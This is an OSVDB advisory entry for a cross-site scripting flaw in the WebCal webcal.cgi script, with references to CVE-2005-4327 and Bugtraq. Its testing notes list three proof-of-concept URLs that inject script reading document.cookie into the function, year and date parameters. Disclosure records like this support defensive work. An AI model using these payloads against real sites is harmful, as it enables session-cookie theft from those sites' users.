Michael Arndt WebCal webcal.cgi Multiple Variable XSS

2005-12-16T14:48:36
ID OSVDB:21999
Type osvdb
Reporter OSVDB
Modified 2005-12-16T14:48:36

Description

Manual Testing Notes

http://[target]/perl/webcal.cgi?function=<script>alert(document.cookie)</script>&cal=public http://[target]/perl/webcal.cgi?function=webyear&cal=public&year=<script>alert(document.cookie)</script> http://[target]/perl/webcal.cgi?function=webday&cal=public&date=<script>alert(document.cookie)</script>

References:

Vendor URL: http://bulldog.tzo.org/webcal/webcal.html Secunia Advisory ID:18017 Related OSVDB ID: 22000 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-12/0206.html CVE-2005-4327 Bugtraq ID: 15917